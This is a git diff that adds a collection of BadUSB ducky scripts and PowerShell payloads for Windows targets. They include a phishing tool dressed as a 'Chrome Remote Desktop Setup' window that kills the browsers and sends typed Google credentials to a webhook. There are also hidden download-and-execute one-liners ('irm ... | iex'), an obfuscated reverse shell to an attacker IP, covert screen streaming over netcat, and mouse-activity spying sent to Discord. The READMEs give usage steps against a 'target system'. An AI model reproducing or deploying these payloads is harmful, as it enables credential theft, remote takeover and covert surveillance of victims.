+ +SYNOPSIS + +Uses Powershell and HTML to create a fake google login page which catches login credentials and sends them to a webhook. + +USAGE + +1. Replace YOUR_WEBBHOOK_HERE with your webhook +2. Run script on target system. diff --git a/Google-Phishing/main.ps1 b/Google-Phishing/main.ps1 new file mode 100644 index 0000000..a910b3d --- /dev/null +++ b/Google-Phishing/main.ps1 @@ -0,0 +1,274 @@ +#========================================== WINDOW ONE (SETUP) ===================================================== +Add-Type -AssemblyName System.Windows.Forms +Add-Type -AssemblyName System.Drawing +[System.Windows.Forms.Application]::EnableVisualStyles() + +$base64IconString = "iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAMAAACdt4HsAAABMlBMVEVHcExChfRChfRAm3jqQzVChfQ0qFNChfTxcyVChfVChfQ0qFPrRzPqQzU0qFMzp1bqQzU0qFM0qFM0plw0qFNChfQ0qFPqQzVChfRChfTqQzU0qFPqQzXqQzU0qFPqQzXqQzXqQzXqQzXrRDT7vAX8vAU1qFLqQjXqQzXqQzX8vQRAqU40qFNChfTqQzXqQzU0qFNChfT0uwj7vAU0qFM0qFPqQzX7vAU5m5BChfP7vAVChfT7vAXqQzU0qFPqQzVChfT7vAU0qFPqQzX7vAVBh+v7vAX7vAX7vAX1uAlChfT7vAW+th32lxRChfRChfRChfQ0qFNChfTqQzX7vAUyqFX+vARAi9o9krg2o2vRuBX6tQiltCbzgxztWixFqkx8rzf4pw1frUL2lhTrSzLwbyTRhUDUAAAAUXRSTlMA4R4G9SWqYQfoUOFL4lENcj3SZ/zy9/kP+j4cg9TvHbP9U8QZ8bsPpzQ6SHU/J2Uvzf16Jod2Tf5zubzVkH7uIWeTl936kp+GrY2OeHgwmKE8ZUQjAAAC40lEQVRYw82Wd3eaUBjGSTCogBiGGBEHmjiiUWPVxiwymu51BW1GmyZp8/2/QlUU4bL1tKfP8T94fr7zchHk/1UkVy00e6LYaxaEXDmoO0eK+ZgsKcr4p0ihWPGkkAvw38JJJqmYJCnJzKUQ8Wcn87Jiq1Ce9IGoVkKKo0KVqoe93IsproptutazkZcUD0kVl2oKGcWHio5pkDE/fiXUXNG/6dAKwa/fqX62+UvJpOTPX85bzHLxcrNAkoXmSVH29CM9qH9STBT0jperYsbDX4UKIIsNaLtE2c0fqUCtFuyGxNmPkOb5tx+2RsFxlSLvfvw2+gMfH7s76q973Z8P7Ec+qKr6+DzzZxqB/dvHY4B6p6WRbAY/Pl+21SlhmsYSCSBv1Zke75UQucT5fTgHqHfPxSUC2H6lLgifoIdbeNhROKo3UdfOLgRYXxs4an9rVsOFXz3eDgCIbmjvnBsAh5EAgMSe9s4LA+ANEgCQwq2A1/8UMMBXTGEOWLqI8xSWbmNqb8VBSny2jPKo/REG7EfNMgDW1uFlGrUfSnEzAD3bMOosnLKOsr7Oo9snwFPum9c3RPAVOlDU7z+HAMAhQMt5ZAD0TUfaqD31A551A+Ap6ypoh+ro9gEMJwDAtHwGoJdg2sjbp6l7olLauQKGAAbvjR8WLXxNHOZUBjw6sM0AQWr8wg84gNnHgJuG6mjL2G0MmFSirfZ4P2qa47DpaYswE7LdDjRQNHbwzTGAseqcmQCILq2XAk1TWBaAGwMhgcMBQklMomAu6lStRrFdjNDwN9c64AsKp9hhLISxi+N5Y2jDg6vZDJxZi0QTwFNDoBUiumfXJcoHQUsjEbafE3+E4fVV32lSacYPIeuybh2M87JzhOuJEa97pMFhLY+PfQvjXfwMG/e8LqC1ydTZ20/Tvm4cKH3BWMPIlti0/1tLutYtEdlZRTmeYDC2hQa8+aBpmmLrp6d1lqI7cWQVocjf1B+DjRopJPWlbAAAAABJRU5ErkJggg==" +$iconimageBytes = [Convert]::FromBase64String($base64IconString) +$ims = New-Object IO.MemoryStream($iconimageBytes, 0, $iconimageBytes.Length) +$ims.Write($iconimageBytes, 0, $iconimageBytes.Length); +$alkIcon = [System.Drawing.Image]::FromStream($ims, $true) + +$base64String = "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" +$imageBytes = [System.Convert]::FromBase64String($base64String) +$memoryStream = New-Object IO.MemoryStream($imageBytes, 0, $imageBytes.Length) +$memoryStream.Write($imageBytes, 0, $imageBytes.Length); +$image = [System.Drawing.Image]::FromStream($memoryStream) + +$setupwindow = New-Object System.Windows.Forms.Form +$setupwindow.ClientSize = '600,450' +$setupwindow.Text = "Chrome Remote Desktop Setup" +$setupwindow.BackColor = "#ffffff" +$setupwindow.Opacity = 1 +$setupwindow.TopMost = $true +$setupwindow.Icon = [System.Drawing.Icon]::FromHandle((new-object System.Drawing.Bitmap -argument $ims).GetHIcon()) +$setupwindow.FormBorderStyle = 'FixedSingle' + +$nextbutton = New-Object System.Windows.Forms.Button +$nextbutton.Text = "Next" +$nextbutton.Width = 85 +$nextbutton.Height = 42 +$nextbutton.Location = New-Object System.Drawing.Point(490, 395) +$nextbutton.Font = 'Open Sans,12' +$nextbutton.BackColor = "#287ae6" +$nextbutton.ForeColor = "#ffffff" + +$textfield = New-Object System.Windows.Forms.Label +$textfield.Text = "Welcome to Google Remote Desktop Host" +$textfield.ForeColor = "#000000" +$textfield.AutoSize = $true +$textfield.Location = New-Object System.Drawing.Point(145, 140) +$textfield.Font = 'Microsoft Sans Serif,12' + +$infofield = New-Object System.Windows.Forms.Label +$infofield.Text = "Remote access for your PC. Sign in with google to continue.." +$infofield.ForeColor = "#000000" +$infofield.AutoSize = $true +$infofield.Location = New-Object System.Drawing.Point(120, 230) +$infofield.Font = 'Microsoft Sans Serif,10' + +$infofield2 = New-Object System.Windows.Forms.Label +$infofield2.Text = "Chrome will close and restart during installation" +$infofield2.ForeColor = "#000000" +$infofield2.AutoSize = $true +$infofield2.Location = New-Object System.Drawing.Point(155, 260) +$infofield2.Font = 'Microsoft Sans Serif,10' + +$linkfield = New-Object System.Windows.Forms.Label +$linkfield.Text = "Sign in to your account" +$linkfield.ForeColor = "#287ae6" +$linkfield.AutoSize = $true +$linkfield.Location = New-Object System.Drawing.Point(345, 407) +$linkfield.Font = 'Microsoft Sans Serif,10' + +$pictureBox = New-Object System.Windows.Forms.PictureBox +$pictureBox.Size = New-Object System.Drawing.Size(300, 300) +$pictureBox.SizeMode = 'AutoSize' +$pictureBox.Image = $image +$pictureBox.Location = New-Object System.Drawing.Point(170, 50) + +$setupwindow.controls.AddRange(@($nextbutton,$linkfield,$textfield,$infofield,$infofield2,$pictureBox)) + +$nextbutton.Add_Click({ + +$setupwindow.Close() +}) + + +[void]$setupwindow.ShowDialog() + +Start-Process -FilePath "taskkill" -ArgumentList "/F", "/IM", "chrome.exe" -NoNewWindow -Wait +Start-Process -FilePath "taskkill" -ArgumentList "/F", "/IM", "msedge.exe" -NoNewWindow -Wait +Sleep 1 + + +$htmlcode1 = @" + + + + + + +
+ 
+
+
+
+"@
+
+
+$htmlFile = "$env:temp\google.html"
+$htmlcode1 | Out-File $htmlFile -Force
+$webhk | Out-File $htmlFile -Append -Force
+$htmlcode2 | Out-File $htmlFile -Append -Force
+
+
+$screen = [System.Windows.Forms.Screen]::PrimaryScreen
+$screenWidth = $screen.WorkingArea.Width
+$screenHeight = $screen.WorkingArea.Height
+$left = ($screenWidth - $width) / 2
+$top = ($screenHeight - $height) / 2
+$chromePath = "C:\Program Files\Google\Chrome\Application\chrome.exe"
+$width = 530
+$height = 600
+
+$arguments = "--new-window --window-position=$left,$top --window-size=$width,$height --app=$htmlFile"
+$chromeProcess = Start-Process -FilePath $chromePath -ArgumentList $arguments -PassThru
+$chromeProcess.WaitForExit()
+
+sleep 2
+$outword = "No Logs"
+$outword | Out-File $htmlFile -Force
+sleep 1
diff --git a/LAN-Tools/LAN-Tools.txt b/LAN-Tools/LAN-Tools.txt
new file mode 100644
index 0000000..217209c
--- /dev/null
+++ b/LAN-Tools/LAN-Tools.txt
@@ -0,0 +1,15 @@
+REM Title: beigeworm's LAN Tools
+REM Author: @beigeworm
+REM Description: Start up a HTTP server and run a selection of Local Area Network Tools using Powershell.
+REM NOTE - This script will need Admin privileges to run properly.
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove "-W H" to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/Posh-LAN/main/Posh-LAN-Tools.ps1 | iex
+ENTER
+
diff --git a/LAN-Tools/README.md b/LAN-Tools/README.md
new file mode 100644
index 0000000..3c2083f
--- /dev/null
+++ b/LAN-Tools/README.md
@@ -0,0 +1,17 @@
+
+
+
+
+ Sign in
+Use your Google Account
+ +Beigeworm's Powershell LAN Toolset
+ +MAIN SCRIPT HERE - https://github.com/beigeworm/Posh-LAN + +SYNOPSIS + +Start up a HTTP server and run a selection of Local Area Network Tools using Powershell. + +USAGE + +1. Run this script on target computer and note the URL provided +2. on another device on the same network, enter the provided URL in a browser window + +NOTE + +This script will need Admin privaleges to run properly. diff --git a/Mouse-Monitor-to-Discord/Mouse-Activity-to-Discord.txt b/Mouse-Monitor-to-Discord/Mouse-Activity-to-Discord.txt new file mode 100644 index 0000000..458d23b --- /dev/null +++ b/Mouse-Monitor-to-Discord/Mouse-Activity-to-Discord.txt @@ -0,0 +1,20 @@ + +REM Title: beigeworm's monitor mouse activity to Discord Webhook. +REM Author: @beigeworm +REM Description: This script monitors mouse activity and posts results to a discord webhook. +REM Target: Windows 10 + +REM *SETUP* +REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_mm_to_dc | iex +ENTER + + diff --git a/Mouse-Monitor-to-Discord/README.md b/Mouse-Monitor-to-Discord/README.md new file mode 100644 index 0000000..92040bf --- /dev/null +++ b/Mouse-Monitor-to-Discord/README.md @@ -0,0 +1,11 @@ + +Mouse Monitor to Discord
+ +SYNOPSIS + +This script gathers information about any mouse movement and idletime and sends info to Discord". + +USAGE + +2. Run Script on target System +3. Check Discord for results diff --git a/Mouse-Monitor-to-Discord/main.ps1 b/Mouse-Monitor-to-Discord/main.ps1 new file mode 100644 index 0000000..1753309 --- /dev/null +++ b/Mouse-Monitor-to-Discord/main.ps1 @@ -0,0 +1,69 @@ +$whuri = "$dc" + +$signature = @' +[DllImport("user32.dll")] +[return: MarshalAs(UnmanagedType.Bool)] +public static extern bool GetCursorPos(out POINT lpPoint); +[StructLayout(LayoutKind.Sequential)] +public struct POINT +{ + public int X; + public int Y; +} +'@ + +$timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss" +$outpath = "$env:temp\info.txt" +$cursorType = Add-Type -MemberDefinition $signature -Name "CursorPos" -Namespace "Win32" -PassThru +$prevX = 0 +$idleThreshold = New-TimeSpan -Seconds 60 +$lastActivityTime = [System.DateTime]::Now +$isActive = $true +$iActive = $true +sleep 1 + +while ($true) { + $cursorPos = New-Object Win32.CursorPos+POINT + [Win32.CursorPos]::GetCursorPos([ref]$cursorPos) | Out-Null + $currentX = $cursorPos.X + $currentTime = [System.DateTime]::Now + + if ($currentX -ne $prevX) { + if ($iActive) { + $prevX = $currentX + $lastActivityTime = $currentTime + + if ($idleTime -lt $idleThreshold) { + $msgsys = "[$timestamp] : Mouse is active" + $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} + $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json + Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys + } + $iActive = $false + } +} +else { + $iActive = $true + } + + + $idleTime = $currentTime - $lastActivityTime + + if ($idleTime -ge $idleThreshold) { + if ($isActive) { + $msgsys = "[$timestamp] : Mouse has been inactive for 60 seconds" + $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} + $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json + Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys + $isActive = $false + $iActive = $true + } + else { + } + } + else { + $isActive = $true + } + Start-Sleep -Milliseconds 60 +} + diff --git a/Netcat-Client/README.md b/Netcat-Client/README.md new file mode 100644 index 0000000..0f5f8c5 --- /dev/null +++ b/Netcat-Client/README.md @@ -0,0 +1,17 @@ + +Simple Netcat Client
+ +SYNOPSIS + +Opens a netcat connection to a Windows machine in Powershell + +USAGE + +1. Download Ncat For windows. https://nmap.org/download#windows +2. Change "YOUR IP HERE" to the attacker machine's ipv4 address (find using ipconfig on windows) +3. Open a terminal on the attacker machine and type "nc -lvp 4444" +4. Run this script on the client machine. + +NOTE + +The PORT number is 4444 \ No newline at end of file diff --git a/Netcat-Client/Simple-Netcat-Client.txt b/Netcat-Client/Simple-Netcat-Client.txt new file mode 100644 index 0000000..451da8c --- /dev/null +++ b/Netcat-Client/Simple-Netcat-Client.txt @@ -0,0 +1,20 @@ + +REM Title: Beigeworm's Simple Netcat Client +REM Author: @beigeworm +REM Description: This script connects target computer with a netcat session to send powershell commands. +REM Target: Windows 10 + +REM *SETUP* +REM replace IP_HERE with your netcat attacker IP Address. +REM NOTE The PORT number is 4444 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $ip='IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Netcat-Client/main.ps1 | iex +ENTER + diff --git a/Netcat-Client/main.ps1 b/Netcat-Client/main.ps1 new file mode 100644 index 0000000..4bf592f --- /dev/null +++ b/Netcat-Client/main.ps1 @@ -0,0 +1,14 @@ + +do{ +$v = 4 +$a = New-Object S`ySt`em.N`eT.`s`ock`eTs.TC`PC`li`eNt("$ip",4444) +$b = $a.GetStream();[byte[]]$c = 0..65535|%{0} +while(($d = $b.Read($c, 0, $c.Length)) -ne 0){ +$e = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($c,0, $d) +$f = (iex $e 2>&1 | Out-String );$g = $f + (pwd).Path + '> ' +$h = ([text.encoding]::ASCII).GetBytes($g) +$b.Write($h,0,$h.Length) +$b.Flush()} +$a.Close() +Sleep 10 +}while ($v -le 5) diff --git a/Netcat-Screenshare/Desktop Screenshare over Netcat.txt b/Netcat-Screenshare/Desktop Screenshare over Netcat.txt new file mode 100644 index 0000000..4b721ce --- /dev/null +++ b/Netcat-Screenshare/Desktop Screenshare over Netcat.txt @@ -0,0 +1,20 @@ +REM Title: Beigeworm's Screenshare Through Netcat +REM Author: @beigeworm +REM Description: This script connects target computer with a netcat session to send a stream of the desktop to a browser window. +REM Target: Windows 10 + +REM *SETUP* +REM replace YOUR_IP_HERE with your netcat attacker IP Address. +REM Run script on target Windows system. +REM On a Linux box use this command > nc -lvnp 9000 | nc -lvnp 8080 (Netcat is required) +REM Then in a firefox browser on the Linux box > http://localhost:8080 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $ip='YOUR_IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Netcat-Screenshare/main.ps1 | iex +ENTER diff --git a/Netcat-Screenshare/README.md b/Netcat-Screenshare/README.md new file mode 100644 index 0000000..084db6c --- /dev/null +++ b/Netcat-Screenshare/README.md @@ -0,0 +1,14 @@ + +Desktop Screensahre Over Netcat
+ +SYNOPSIS + +Starts a video stream of the desktop to a netcat session (the output is viewed in a browser.) + +USAGE + +Run script on target Windows system. +On a Linux box use this command > nc -lvnp 9000 | nc -lvnp 8080 +Then in a firefox browser goto > http://localhost:8080 + +(Firefox is the only browser that supports the codec for the video stream..) \ No newline at end of file diff --git a/Netcat-Screenshare/main.ps1 b/Netcat-Screenshare/main.ps1 new file mode 100644 index 0000000..5637ccb --- /dev/null +++ b/Netcat-Screenshare/main.ps1 @@ -0,0 +1,45 @@ +$IP = "$ip" +$PORT = "9000" + +while ($true){ +try{ + Add-Type -AssemblyName System.Windows.Forms + [System.IO.MemoryStream] $MemoryStream = New-Object System.IO.MemoryStream + $socket = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp) + $socket.Connect($IP,$PORT) + + function SendResponse($sock, $string){ + if ($sock.Connected){ + $bytesSent = $sock.Send($string) + if ( $bytesSent -eq -1 ){}}} + + function SendStrResponse($sock, $string){ + if ($sock.Connected){ + $bytesSent = $sock.Send( + [text.Encoding]::Ascii.GetBytes($string)) + if ( $bytesSent -eq -1 ){}}} + + function SendHeader([net.sockets.socket] $sock,$length,$statusCode = "200 OK",$mimeHeader="text/html",$httpVersion="HTTP/1.1"){ + $response = "HTTP/1.1 $statusCode`r`n" + "Content-Type: multipart/x-mixed-replace; boundary=--boundary`r`n`n" + SendStrResponse $sock $response} + SendHeader $socket + + while ($True){ + $b = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height) + $g = [System.Drawing.Graphics]::FromImage($b) + $g.CopyFromScreen((New-Object System.Drawing.Point(0,0)), (New-Object System.Drawing.Point(0,0)), $b.Size) + $g.Dispose() + $MemoryStream.SetLength(0) + $b.Save($MemoryStream, ([system.drawing.imaging.imageformat]::jpeg)) + $b.Dispose() + $length = $MemoryStream.Length + [byte[]] $Bytes = $MemoryStream.ToArray() + $str = "`n`n--boundary`n" + + "Content-Type: image/jpeg`n" + + "Content-Length: $length`n`n" + SendStrResponse $socket $str + SendResponse $socket $Bytes + } +$MemoryStream.Close() +}catch{Write-Error $_}} + diff --git a/Network-Enumeration-GUI/Network-Enumeration-GUI.txt b/Network-Enumeration-GUI/Network-Enumeration-GUI.txt new file mode 100644 index 0000000..551e17a --- /dev/null +++ b/Network-Enumeration-GUI/Network-Enumeration-GUI.txt @@ -0,0 +1,16 @@ +REM Title: beigeworm's LAN Device Enumeration GUI Tool. +REM Author: @beigeworm +REM Description: This script creates a GUI for enumerating devices on the local network. +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Network-Enumeration-GUI/main.ps1 | iex +ENTER + + diff --git a/Network-Enumeration-GUI/README.md b/Network-Enumeration-GUI/README.md new file mode 100644 index 0000000..3fe4042 --- /dev/null +++ b/Network-Enumeration-GUI/README.md @@ -0,0 +1,6 @@ + +Network Enumeration GUI
+ +SYNOPSIS + +This script creates a GUI window for enumerating devices on the local network. diff --git a/Network-Enumeration-GUI/main.ps1 b/Network-Enumeration-GUI/main.ps1 new file mode 100644 index 0000000..0330ff3 --- /dev/null +++ b/Network-Enumeration-GUI/main.ps1 @@ -0,0 +1,264 @@ + +<# +====================== Mon's Network Enumeration Tool With GUI ========================== + +SYNOPSIS +This script presents a GUI for enumerating other devices on the LAN network.. + +USAGE +1. Run script with powershell +2. Input ip Range and select additional parameters +3. Press "Start Scan" + +#> + +Add-Type -AssemblyName System.Windows.Forms +Add-Type -AssemblyName System.Drawing +Add-Type -AssemblyName Microsoft.VisualBasic +[System.Windows.Forms.Application]::EnableVisualStyles() + +$tooltip1 = New-Object System.Windows.Forms.ToolTip +$ShowHelp={ + Switch ($this.name) { + + + "start" {$tip = "Start Search"} + + "ipsearch" {$tip = "Define the first part of the IP here"} + + "startrange" {$tip = "Define the start of the IP range"} + + "endrange" {$tip = "Define the start of the IP range"} + + "hostname" {$tip = "Try to resolve each IP's hostname"} + + "ssh" {$tip = "Test port 22 (ssh) on each IP"} + + "manufact" {$tip = "Get any manufacturer details"} +} +$tooltip1.SetToolTip($this,$tip) +} + +$MainWindow = New-Object System.Windows.Forms.Form +$MainWindow.ClientSize = '552,535' +$MainWindow.Text = "| beigetools | LAN Device Search & Enumeration |" +$MainWindow.BackColor = "#242424" +$MainWindow.Opacity = 0.93 +$MainWindow.TopMost = $false +$MainWindow.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon("C:\Windows\System32\DevicePairingWizard.exe") + +$OutputBox = New-Object System.Windows.Forms.TextBox +$OutputBox.Multiline = $True; +$OutputBox.Location = New-Object System.Drawing.Size(15,180) +$OutputBox.Width = 522 +$OutputBox.Height = 340 +$OutputBox.Scrollbars = "Vertical" +$OutputBox.Text = "----------------------------------- RESULTS -----------------------------------" +$OutputBox.Font = 'Microsoft Sans Serif,8,style=Bold' + +$StartScan = New-Object System.Windows.Forms.Button +$StartScan.Text = "Start" +$StartScan.Width = 100 +$StartScan.Height = 25 +$StartScan.Location = New-Object System.Drawing.Point(435, 33) +$StartScan.Font = 'Microsoft Sans Serif,8,style=Bold' +$StartScan.BackColor = "#eeeeee" +$StartScan.add_MouseHover($showhelp) +$StartScan.name="start" + +$sshboxtext = New-Object System.Windows.Forms.Label +$sshboxtext.Text = "Test for SSH" +$sshboxtext.ForeColor = "#bcbcbc" +$sshboxtext.AutoSize = $true +$sshboxtext.Width = 25 +$sshboxtext.Height = 10 +$sshboxtext.Location = New-Object System.Drawing.Point(35, 67) +$sshboxtext.Font = 'Microsoft Sans Serif,8,style=Bold' + +$sshbox = New-Object System.Windows.Forms.CheckBox +$sshbox.Width = 20 +$sshbox.Height = 20 +$sshbox.Location = New-Object System.Drawing.Point(15, 65) +$sshbox.add_MouseHover($showhelp) +$sshbox.name="ssh" + +$manufacturerboxtext = New-Object System.Windows.Forms.Label +$manufacturerboxtext.Text = "Include Manufacturer" +$manufacturerboxtext.ForeColor = "#bcbcbc" +$manufacturerboxtext.AutoSize = $true +$manufacturerboxtext.Width = 25 +$manufacturerboxtext.Height = 10 +$manufacturerboxtext.Location = New-Object System.Drawing.Point(35, 97) +$manufacturerboxtext.Font = 'Microsoft Sans Serif,8,style=Bold' + +$manufacturerbox = New-Object System.Windows.Forms.CheckBox +$manufacturerbox.Width = 20 +$manufacturerbox.Height = 20 +$manufacturerbox.Location = New-Object System.Drawing.Point(15, 95) +$manufacturerbox.add_MouseHover($showhelp) +$manufacturerbox.name="manufact" + +$hostnameboxtext = New-Object System.Windows.Forms.Label +$hostnameboxtext.Text = "Include Network Hostname" +$hostnameboxtext.ForeColor = "#bcbcbc" +$hostnameboxtext.AutoSize = $true +$hostnameboxtext.Width = 25 +$hostnameboxtext.Height = 10 +$hostnameboxtext.Location = New-Object System.Drawing.Point(35, 127) +$hostnameboxtext.Font = 'Microsoft Sans Serif,8,style=Bold' + +$hostnamebox = New-Object System.Windows.Forms.CheckBox +$hostnamebox.Width = 20 +$hostnamebox.Height = 20 +$hostnamebox.Location = New-Object System.Drawing.Point(15, 125) +$hostnamebox.add_MouseHover($showhelp) +$hostnamebox.name="hostname" + +$TextboxInputHeader = New-Object System.Windows.Forms.Label +$TextboxInputHeader.Text = "Search IP Range for All Devices" +$TextboxInputHeader.ForeColor = "#bcbcbc" +$TextboxInputHeader.AutoSize = $true +$TextboxInputHeader.Width = 25 +$TextboxInputHeader.Height = 10 +$TextboxInputHeader.Location = New-Object System.Drawing.Point(15, 15) +$TextboxInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold' + +$TextBoxInput = New-Object System.Windows.Forms.TextBox +$TextBoxInput.Location = New-Object System.Drawing.Point(15, 35) +$TextBoxInput.BackColor = "#eeeeee" +$TextBoxInput.Width = 140 +$TextBoxInput.Height = 40 +$TextBoxInput.Text = "192.168.0." +$TextBoxInput.Multiline = $false +$TextBoxInput.Font = 'Microsoft Sans Serif,8,style=Bold' +$TextBoxInput.add_MouseHover($showhelp) +$TextBoxInput.name="ipsearch" + +$dashline = New-Object System.Windows.Forms.Label +$dashline.Text = "-" +$dashline.ForeColor = "#bcbcbc" +$dashline.AutoSize = $true +$dashline.Width = 25 +$dashline.Height = 10 +$dashline.Location = New-Object System.Drawing.Point(220, 35) +$dashline.Font = 'Microsoft Sans Serif,9,style=Bold' + +$startip = New-Object System.Windows.Forms.TextBox +$startip.Location = New-Object System.Drawing.Point(170, 35) +$startip.BackColor = "#eeeeee" +$startip.Width = 50 +$startip.Height = 40 +$startip.Text = "1" +$startip.Multiline = $false +$startip.Font = 'Microsoft Sans Serif,8,style=Bold' +$startip.add_MouseHover($showhelp) 